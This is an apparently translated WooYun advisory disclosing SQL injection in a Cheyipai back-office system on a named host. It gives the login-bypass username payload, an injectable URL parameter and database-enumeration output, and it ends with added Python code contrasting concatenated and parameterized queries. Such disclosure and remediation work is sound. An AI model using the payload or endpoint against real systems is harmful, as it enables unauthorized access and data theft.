
Vulnerability summary

Bug ID: wooyun-2016-0187159

Title: Multiple SQL injections in a Cheyipai system

Vendor: cheyipai.com

Author: niliu

Submitted: 2016-03-21 07:33

Fixed: 2016-05-05 16:34

Disclosed: 2016-05-05 16:34

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org



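Vulnerability details

Disclosure status:

2016-03-21: Details reported to the vendor; awaiting vendor handling
2016-03-21: Vendor confirmed; details visible to the vendor only
2016-03-31: Details disclosed to core white hats and experts in related fields
2016-04-10: Details disclosed to regular white hats
2016-04-20: Details disclosed to intern white hats
2016-05-05: Details disclosed to the public

Brief description:

-,-

Detailed description:

http://xing.268v.com
This is a business back-office system. First, the login interface is injectable.
The following username logs in directly:
admin' or '1'='1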



2.
http://xing.268v.com/pages/forms/SaleBill.aspx?bid=764&wfno=SG108&bizid=764&carid=536&biztype=0&currentSubWfNo=&wfnod=SG107&isarea=
The wfno parameter is injectable.

available databases [12]:                                                      
[*] AuthenticateCar
[*] BugTracker
[*] cheyipaidb
[*] df268vdb
[*] ErrorLog
[*] master
[*] model
[*] msdb
[*] SMS
[*] tempdb
[*] xing
[*] YTUCMSDB


12 databases



Proof of vulnerability:

Database: xing                                                                 
[87 tables]


Fix:

Strengthen filtering

Copyright notice: when reposting, credit the source niliu@WooYun
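The login bypass reported above works when user input is concatenated into the SQL text; parameterized queries are the standard remedy for this class of bug. The following is an added example, not code from the report or the vendor: it uses Python and SQLite as stand-ins for the ASP.NET back end, with hypothetical table, column and function names and an assumed wfno format, and contrasts a concatenated login query with a parameterized one and an allow-listed wfno lookup.

```python
import hashlib
import hmac
import re
import sqlite3

def hash_pw(pw):
    # Plain SHA-256 keeps the demo short; use a real password KDF in production.
    return hashlib.sha256(pw.encode()).hexdigest()

def make_db():
    # Constructed sample data; the schema is hypothetical, not the vendor's.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT PRIMARY KEY, pw_hash TEXT)")
    db.execute("CREATE TABLE bills (wfno TEXT, title TEXT)")
    db.execute("INSERT INTO users VALUES (?, ?)", ("admin", hash_pw("S3cret!")))
    db.executemany("INSERT INTO bills VALUES (?, ?)",
                   [("SG108", "sale bill"), ("SG107", "inspection")])
    return db

def login_vulnerable(db, name, pw):
    # Input is spliced into the SQL text, so a quote in `name` rewrites the
    # WHERE clause: name = 'admin' OR ('1'='1' AND pw_hash = '...').
    sql = ("SELECT name FROM users WHERE name = '" + name +
           "' AND pw_hash = '" + hash_pw(pw) + "'")
    return db.execute(sql).fetchone() is not None

def login_safe(db, name, pw):
    # The placeholder binds `name` as data; it is never parsed as SQL.
    row = db.execute("SELECT pw_hash FROM users WHERE name = ?",
                     (name,)).fetchone()
    return row is not None and hmac.compare_digest(row[0], hash_pw(pw))

# Assumed shape of a workflow number, based on values such as SG108 in the URL.
WFNO_RE = re.compile(r"[A-Z]{2}\d{3}")

def bills_for(db, wfno):
    # Allow-list the format first, then still bind the value as a parameter.
    if not WFNO_RE.fullmatch(wfno):
        raise ValueError("invalid wfno")
    return db.execute("SELECT title FROM bills WHERE wfno = ?",
                      (wfno,)).fetchall()
```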


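Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2016-03-21 16:34

Vendor reply:

The vulnerability has been confirmed. Thank you for your attention.

Latest status:

None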

